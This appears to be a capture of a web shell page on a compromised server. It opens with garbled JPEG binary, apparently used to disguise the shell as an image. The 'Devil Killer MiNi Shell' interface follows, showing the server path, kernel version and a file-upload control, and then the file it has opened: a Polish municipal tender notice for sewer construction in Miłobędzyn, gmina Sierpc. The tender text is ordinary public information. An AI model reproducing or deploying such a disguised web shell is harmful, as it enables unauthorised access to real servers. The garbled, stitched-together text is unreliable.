JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220401/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220401/0010753001-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Budowa sieci kanalizacji sanitarnej w m. Miłobędzyn,<br/>gmina Sierpc, powiat Sierpecki </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Sierpc</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 611015945</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Biskupa Floriana 4</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Sierpc</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">09-200</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL923 - Płocki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">(24) 275 23 31</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">(24) 275 57 01 w.29</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">info@gmina.sierpc.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.gmina.sierpc.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Budowa sieci kanalizacji sanitarnej w m. Miłobędzyn,<br/>gmina Sierpc, powiat Sierpecki </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-cd0c6533-b1ae-11ec-80f8-1ad70aec7fa4</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00107530</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-04-01</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00024127/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 Budowa sieci kanalizacji sanitarnej w m. Miłobędzyn</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ugsierpc.bipgmina.pl/wiadomosci/3/wiadomosc/622372/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">miniPortal (https://miniportal.uzp.gov.pl/)<br/> <br/> Elektroniczna Skrzynka Podawcza Urzędu Gminy w Sierpcu: adres <br/> skrzynki podawczej ePUAP: 3f4ih06ymt/SkrytkaESP</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej zostały określone w rozdziale X.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Administratorem Pani/Pana danych osobowych przetwarzanych w Urzędzie Gminy <br/> w Sierpcu jest Wójt Gminy Sierpc, ul. Biskupa Floriana 4, 09-200 Sierpc; <br/>2. administrator – Wójt Gminy Sierpc wyznaczył Inspektora Danych Osobowych, z którym <br/> można się kontaktować pod numerem telefonu: (24) 275 57 01, adres e-mail: <br/> iod@gmina.sierpc.pl .3. Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu <br/> związanym z postępowaniem o udzielenie zamówienia publicznego, prowadzonym <br/> w trybie podstawowym na roboty budowlane pn. „Budowa sieci kanalizacji sanitarnej <br/> w m. Miłobędzyn, gmina Sierpc, powiat Sierpecki”<br/>4. odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym <br/> udostępniona zostanie dokumentacja postępowania w oparciu o art. 74 ustawy pzp; <br/>5. Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 pzp przez okres 4 <br/> lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania <br/> umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>6. obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana <br/> dotyczących jest wymogiem ustawowym określonym w przepisanych ustawy pzp, <br/> związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; <br/> konsekwencje niepodania określonych danych wynikają z ustawy pzp;<br/>7. w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób <br/> zautomatyzowany, stosownie do art. 22 RODO. <br/>8. posiada Pani/Pan: a) na podstawie art. 15 RODO prawo dostępu do danych osobowych <br/> Pani/Pana dotyczących; b) na podstawie art. 16 RODO prawo do sprostowania Pani/Pana <br/> danych osobowych; c) na podstawie art. 18 RODO prawo żądania od administratora <br/> ograniczenia przetwarzania danych osobowych z zastrzeżeniem okresu trwania <br/> postępowania o udzielenie zamówienia publicznego lub konkursu oraz przypadków, <br/> o których mowa w art. 18 ust. 2 RODO; d) prawo do wniesienia skargi do Prezesa <br/> Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych <br/> osobowych Pani/Pana dotyczących narusza przepisy RODO; <br/>.9. nie przysługuje Pani/Panu: a) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do <br/> usunięcia danych osobowych; b) prawo do przenoszenia danych osobowych, o którym <br/> mowa w art. 20 RODO; c) na podstawie art. 21 RODO prawo sprzeciwu, wobec <br/> przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana <br/> danych osobowych jest art. 6 ust. 1 lit. c RODO;<br/>10. przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego na niezgodne <br/> z RODO przetwarzanie Pani/Pana danych osobowych przez administratora. Organem <br/> właściwym dla przedmiotowej skargi jest Urząd Ochrony Danych Osobowych, <br/> ul. Stawki 2, 00-193 Warszawa.<br/>11. Wykonawca jest zobowiązany, w związku z udziałem w przedmiotowym<br/> postępowaniu, do wypełnienia wszystkich obowiązków formalno-prawnych<br/> wymaganych przez RODO i związanych z udziałem w przedmiotowym postępowaniu<br/> o udzielenie zamówienia. Do obowiązków tych należą:<br/>12. obowiązek informacyjny przewidziany w art. 13 RODO względem osób fizycznych,<br/> których dane osobowe dotyczą i od których dane te wykonawca bezpośrednio<br/> pozyskał i przekazał zamawiającemu w treści oferty lub dokumentów składanych<br/> na żądanie zamawiającego,<br/>13. obowiązek informacyjny wynikający z art. 14 RODO względem osób fizycznych,<br/> których dane wykonawca pozyskał w sposób pośredni, a które to dane wykonawca<br/> przekazuje zamawiającemu w treści oferty lub dokumentów składanych <br/> na żądanie zamawiającego.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">BI.271.1.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 1673558,34 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.Nazwa nadana zamówieniu przez Zamawiającego:<br/> „Budowa sieci kanalizacji sanitarnej w m. Miłobędzyn, gmina Sierpc, powiat Sierpecki”<br/><br/>2. Zamówienie obejmuje:<br/>2.1. Zadanie 1 pn.: „Budowa sieci kanalizacji sanitarnej z odcinkami łączącymi sieć z <br/> posesjami w Miłobędzynie, gm. Sierpc nr dz. 126/5, 129, 126/3, 131/18, <br/> 131/9, 131/8, 131/3, 131/4, 97”<br/>2.2. Zadanie 2 pn.: „Budowa kanalizacji sanitarnej w m. Miłobędzyn”<br/> (W FORMULE ZAPROJEKTUJ I WYBUDUJ).<br/><br/>3. Zamówienie jest dofinansowane z Rządowego Funduszu Polski Ład: Program<br/> Inwestycji Strategicznych.<br/><br/>4. OPIS PRZEDMIOTU ZAMÓWIENIA.<br/>4.1. Zadanie 1: „Budowa sieci kanalizacji sanitarnej z odcinkami łączącymi sieć <br/> z posesjami w Miłobędzynie, gm. Sierpc nr dz. 126/5, 129, 126/3, 131/18, <br/> 131/9, 131/8, 131/3, 131/4, 97”<br/><br/>1) Miejsce wykonania zadania 1: Gmina Sierpc (gmina wiejska);<br/><br/> Obręb ewidencyjny 0022 Miłobędzyn;<br/> Działki nr ewidencyjny: 126/5, 129, 126/3, <br/> 131/18, 131/9, 131/8, 131/3, 131/4 i 97 <br/><br/>2) Zakres zadania 1: W ramach zadania należy wybudować sieć kanalizacji sanitarnej <br/> z odcinkami łączącymi sieć z posesjami. Zakres zadania 1 obejmuje m.in. budowę sieci <br/> kanalizacyjnej z rur PCV 200 klasy S SDR 34 litych o długości 385,81 m.b., z rur PCV <br/> 160 klasy S SDR litych o długości ok. 165,1 m.b., wykonanie na trasie kanalizacji studni <br/> kanalizacyjnych DN1200 betonowych, DN 600 PCV i DN 315 PCV oraz wykonanie <br/> w ulicy studni z kręgów żelbetowych Ø 1200 i Ø 600. Sieć kanalizacyjna posłuży <br/> do odprowadzenia ścieków z gospodarstw domowych w Miłobędzynie. <br/><br/>4.2. Zadanie 2: „Budowa kanalizacji sanitarnej w m. Miłobędzyn”<br/> (W FORMULE ZAPROJEKTUJ I WYBUDUJ)<br/><br/>1) Miejsce wykonania zadania 2: Gmina Sierpc (gmina wiejska);<br/><br/> Obręb ewidencyjny 0019 Kwaśno<br/> Działki nr ewidencyjny: 5, 2/19, 2/20, 4<br/><br/> Obręb ewidencyjny 0022 Miłobędzyn<br/> Działki nr ewidencyjny: 31, 97, 36/5, 36/3, 36/1, <br/> 37/1, 30/1, 37/2, 37/3, 30/2, 38/6, 38/3, 38/2, 38/4, 39/2, 65, <br/> 39/1, 40, 42/5, 41, 42/3, 69/1, 70/1, 43, 44/1, 73, 71, 81, 45, <br/> 46/1, 47, 74, 48, 49, 50, 51, 77, 71, 53/1, 54, 94<br/>2) Zakres zadania 2 obejmuje: <br/> a) wykonanie kompletnej dokumentacji projektowej wraz z uzyskaniem, w imieniu <br/> Zamawiającego, decyzji o pozwoleniu na budowę (Zamawiający przekaże wykonawcy <br/> stosowne upoważnienie do niezbędnych czynności administracyjnych związanych <br/> z uzyskaniem decyzji o pozwoleniu na budowę).<br/> b) na podstawie uzyskanej ostatecznej decyzji o pozwoleniu na budowę oraz w/w <br/> dokumentacji budowę sieci kanalizacji sanitarnej wraz z odgałęzieniami kanalizacyjnymi <br/> do przylegających posesji zakończonymi studniami na prywatnych działkach <br/> w miejscowości Miłobędzyn, gmina Sierpc. <br/>3) Charakterystyczne parametry określające wielkość i zakres robót budowlanych zadania 2:<br/> Kanalizacja sanitarna w miejscowości Miłobędzyn, gmina Sierpc.<br/> - z rur PVC Ø 200 o długości ~ 1170 mb,<br/> - z rur PVC Ø 160 - odgałęzienia o długości ~260 mb, 30 szt<br/> - z rur PVC Ø 90 PE-HD – (przewód tłoczny o długości ~ 1063 mb,<br/> Ilości i wielkości podane powyżej są wielkościami szacunkowymi. Ostateczne długości <br/> kanałów głównych i odgałęzień do prywatnych posesji ustali Wykonawca w Dokumentacji <br/> Projektowej, która będzie podlegać weryfikacji i zatwierdzeniu przez Zamawiającego. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45232410-9 - Roboty w zakresie kanalizacji ściekowej</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45231300-8 - Roboty budowlane w zakresie budowy wodociągów i rurociągów do odprowadzania ścieków</p> <p class="mb-0">45232423-3 - Roboty budowlane w zakresie przepompowni ścieków</p> <p class="mb-0">45232440-8 - Roboty budowlane w zakresie budowy rurociągów do odprowadzania ścieków</p> <p class="mb-0">45255600-5 - Roboty w zakresie kładzenia rur w kanalizacji</p> <p class="mb-0">71320000-7 - Usługi inżynieryjne w zakresie projektowania</p> <p class="mb-0">71322200-3 - Usługi projektowania rurociągów</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-11-15</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze oferty Zamawiający będzie kierował się kryteriami oceny ofert:<br/>1) „Cena” (C) – waga kryterium 60 %;<br/>2) „Okres gwarancji i rękojmi” (GR) – waga kryterium 40 %<br/><br/>2. Kryterium „Cena” będzie rozpatrywane na podstawie ceny brutto za wykonanie przedmiotu <br/> zamówienia (łącznie dla zadań 1 i 2), podanej przez Wykonawcę w formularzu oferty. <br/> Zamawiający przyzna punkty wg następującego wzoru:<br/><br/> Cena najniższa brutto*<br/>C = ------------------------------------- x 100 pkt x 60%<br/> Cena oferty ocenianej brutto<br/><br/><br/>*spośród wszystkich złożonych ofert niepodlegających odrzuceniu<br/><br/>3. Kryterium - „Okres gwarancji i rękojmi” będzie rozpatrywane na <br/> podstawie okresu gwarancji jakości i rękojmi na roboty objęte przedmiotem zamówienia, <br/> podanej przez Wykonawcę w formularzu oferty, punktowany będzie wg. poniższego <br/> schematu na podstawie wskazanego terminu w formularzu oferty:<br/> GR o – GR min<br/>GR = ------------------ x 100 pkt x 40%<br/> GR max – GR min<br/>Gdzie:<br/>GR max – gwarancja i rękojmia maksymalna (60 m-cy),<br/>GR min – gwarancja i rękojmia minimalna (36 m-cy),<br/>GR o – gwarancja i rękojmia oferty ocenianej (w miesiącach).<br/>Termin gwarancji i rękojmi należy proponować w pełnych miesiącach.<br/>UWAGA: Maksymalna liczba 40 punktów zostanie przyznana za udzielenie 60 m-cy lub <br/> dłuższej gwarancji na wykonany przedmiot zamówienia. W przypadku <br/> zaoferowania gwarancji dłuższej niż 60 m-cy, do oceny kryterium będzie brany <br/> okres gwarancji maksymalny.<br/><br/>Minimalny okres gwarancji jakości dla robót budowlanych – 36 m-cy. Zaoferowanie krótszego okresu gwarancji spowoduje odrzucenie oferty.<br/>Jeżeli Wykonawca nie wypełni zobowiązania dotyczącego okresu gwarancji, Zamawiający uzna, że okres gwarancji został udzielony na 36 miesięcy. Każdy kolejny miesiąc nie spowoduje zwiększenia ilości przyznanych punktów.<br/><br/>4. Za najkorzystniejszą zostanie uznana oferta z największą ilością punktów, stanowiących <br/> sumę punktów przyznanych w każdym kryterium z uwzględnieniem wagi procentowej <br/> danego kryterium, obliczonych wg wzoru:<br/>P = C + GR<br/>gdzie:<br/>C – liczba punktów przyznana ofercie ocenianej w kryterium „Cena”,<br/>G – liczba punktów przyznana ofercie ocenianej w kryterium „Okres Gwarancji i Rękojmi”<br/>P – łączna liczba punktów przyznana ofercie ocenianej<br/>5. Punkty zostaną zaokrąglone do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja i rękojmia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1) sytuacji ekonomicznej lub finansowej:<br/> Zamawiający uzna, że Wykonawca spełnia ten warunek jeżeli jest ubezpieczony od <br/> odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem <br/> zamówienia na sumę gwarancyjną w wysokości nie mniejszej niż 300 000,00 zł (słownie: <br/> trzysta tysięcy złotych).<br/><br/>2) zdolności technicznej lub zawodowej:<br/>a) W zakresie osób zdolnych do wykonania zamówienia.<br/> Wykonawca spełni warunek jeżeli wykaże, że dysponuje lub będzie dysponować <br/> następującymi osobami:<br/>- co najmniej jedną osobą posiadającą uprawnienia budowlane w specjalności instalacyjnej <br/> w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, <br/> wodociągowych i kanalizacyjnych. <br/> Ocena spełniania warunku udziału w postępowaniu zostanie dokonana <br/> przez Zamawiającego, w oparciu o informacje zawarte w:<br/> - oświadczeniu o spełnianiu warunków udziału w postępowaniu,<br/> - wykazie osób,<br/> - dokumencie potwierdzającym posiadanie uprawnień budowlanych do kierowania <br/> robotami budowlanymi w branży sanitarnej i do projektowania w specjalności <br/> instalacyjnej w zakresie sieci, instalacji kanalizacyjnych.<br/><br/>b) W zakresie doświadczenia zawodowego niezbędnego do wykonania zamówienia. <br/> Warunek w rozumieniu Zamawiającego spełni Wykonawca, który wykaże wykonanie:<br/> - co najmniej 2 (robót) roboty budowlanej polegającej na budowie, modernizacji <br/> lub przebudowie kanalizacji sanitarnej o wartości – nie mniejszej niż 1.000.000,00 zł <br/> (brutto).wykonanej nie wcześniej niż w okresie ostatnich 5 (pięciu) lat przed upływem <br/> terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym <br/> okresie wraz z podaniem ich rodzaju, wartości, daty wykonania, miejsca wykonania <br/> i podmiotów, na rzecz których roboty te zostały wykonane, z załączeniem dowodów <br/> określających czy te roboty budowlane zostały wykonane należycie oraz wskazujących, <br/> czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone<br/><br/> Ocena spełniania warunku udziału w postępowaniu zostanie dokonana przez <br/> Zamawiającego, w oparciu o informacje zawarte w:<br/> - oświadczeniu o spełnianiu warunków udziału w postępowaniu,<br/> - wykazie wykonanych robót budowlanych oraz w dowodach określających, czy roboty te <br/> zostały wykonane w sposób należyty oraz wykazujących, czy zostały wykonane zgodnie <br/> z zasadami sztuki budowlanej i prawidłowo ukończone.<br/><br/> Dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez <br/> podmiot, na rzecz którego roboty budowlane były wykonane, a jeżeli z uzasadnionej <br/> przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych <br/> dokumentów – inne dokumenty. W przypadku składania oferty wspólnej w/w warunki <br/> będą oceniane łącznie.<br/><br/> Zamawiający może, na każdym etapie postępowania, uznać, że Wykonawca nie posiada <br/> wymaganych zdolności, jeżeli zaangażowanie zasobów technicznych lub zawodowych <br/> Wykonawcy w inne przedsięwzięcia gospodarcze Wykonawcy może mieć negatywny <br/> wpływ na realizacje zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Oświadczenie Wykonawcy o niepodleganiu wykluczeniu – składane na podstawie<br/> art. 125 ust. 